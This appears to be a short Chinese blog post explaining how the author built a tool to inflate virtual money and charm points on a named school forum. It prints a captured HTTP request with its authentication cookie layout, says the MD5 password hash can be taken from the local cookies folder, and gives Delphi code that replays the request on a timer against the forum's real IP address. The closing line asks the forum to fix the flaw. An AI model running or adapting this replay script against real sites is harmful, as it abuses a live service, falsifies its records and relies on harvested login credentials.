针对学校论坛的刷钱工具的内容介绍

针对学校论坛的刷钱工具的内容介绍

我校的建院学子论坛是用的CPB论坛,在每次发贴有个境遇问题,来改变发贴人的钱或魅力,看着很有意思,经过几次发贴,突然发现回贴后出现的页面,通过按F5刷新同样可以经过改变境遇来增加钱数或魅力值,于是明白了白小痴怎么会有这么多钱,不过按F5也太慢了,当然也写一个测试程序了,程序其实很简单,就是一个通过socket向指点的HTTP主机发送数据包
通过IRIS截获 所发送的数据包为

GET /bbs/postfo.asp?t_id=3073&l_id=39&action=do HTTP/1.1
Accept: */*
Referer:
http://stu.sdai.edu.cn/bbs/postfo.asp?t_id=3073&l_id=39&action=do
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: stu.sdai.edu.cn
Connection: Keep-Alive
Cookie: XPlinklinkfylogin=cpb; XPlinklinkfeiyue=userid=XXX&password=XXXXXXXXXXXXXXXX&username=XXXXXXX; ASPSESSIONIDQGQQQLCY=HDIMHDCDMIKGELGOHOJLNPKL


其中通过Cookie 来确定发送者的信息 userid为数据库中的id,password 为密码的 md5 16位加密
这些信息可以从系统的cookies 文件夹中找到
下面写一下主要代码
由于我们只发数据包而不用考虑反回的信息,所以可以用一个timer 控件,来指定间隔时间来发送
构造发送字符串

rl:=chr(13)+chr(10);
sendstr:='GET /bbs/postfo.asp?t_id=3073&l_id=39&action=do HTTP/1.1'+ rl+
'Accept: */*'+rl+
'Referer:
http://stu.sdai.edu.cn/bbs/postfo.asp?t_id=3073&l_id=39&action=do'+rl+
'Accept-Language: zh-cn'+rl+
'Accept-Encoding: gzip, deflate'+rl+
'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)'+rl+
'Host: stu.sdai.edu.cn'+rl+
'Connection: Keep-Alive'+rl+
'Cookie: XPlinklinkfylogin=cpb; XPlinklinkfeiyue=userid='+edit5.Text+'&password='+edit2.Text+'&username='+edit1.Text+'; ASPSESSIONIDQGQQQLCY=HDIMHDCDMIKGELGOHOJLNPKL'+rl+rl+rl;

初始化 tcpclient

tcpc1.RemoteHost:='202.194.85.2';
tcpc1.RemotePort:='80';
tcpc1.Open;

在timer 下加代码
if tcpc1.Connected then
tcpc1.Disconnect;
tcpc1.Connect;
tcpc1.Sendln(sendstr);
可以根据网速设置 timer 的延时

这样一个简单的刷钱工具就做好了, 呵呵,希望论坛更正这一漏洞